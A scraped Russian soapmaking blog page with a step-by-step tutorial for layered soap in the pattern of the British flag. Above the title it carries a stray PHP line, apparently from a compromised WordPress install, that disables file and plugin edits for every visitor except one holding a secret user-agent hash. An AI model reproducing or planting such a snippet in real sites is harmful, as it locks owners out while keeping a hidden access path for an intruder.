if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Да здравствует Ее Величество! или мыло по-британски | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Да здравствует Ее Величество! или мыло по-британски

Сколько ярких граней у искусства мыловарения! Фото работ мыловаров можно легко найти в сети! Однако, бывает и совершенно эксклюзивное мыло. Например, «Британский флаг».

Сколь­ко ярких гра­ней у искус­ства мыло­ва­ре­ния! Фото работ мыло­ва­ров мож­но лег­ко най­ти в сети! Одна­ко, быва­ет и совер­шен­но экс­клю­зив­ное мно­го­слой­ное мыло. Напри­мер, «Бри­тан­ский флаг».

Рас­тап­ли­ва­ем про­зрач­ную осно­ву, добав­ля­ем крас­ный пиг­мент, мас­ло и отдуш­ку, пол­но­стью зали­ва­ем фор­му. Затем ножом про­во­дим на остыв­шем мыле поло­сы, как на фла­ге. Выре­за­ем лиш­ние кусоч­ки и воз­вра­ща­ем крас­ный крест в фор­му. Пусто­ты зали­ва­ем белой осно­вой. После осты­ва­ния обре­за­ем белые края, остав­ляя лишь лег­кую окан­тов­ку вокруг крас­но­го. Сно­ва кла­дем мыло в фор­му. Рас­топ­лен­ная про­зрач­ная осно­ва с синим пиг­мен­том, мас­лом и отдуш­кой ста­нет завер­ша­ю­щим слоем.

флаг2

флаг3

флаг4

флаг5


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!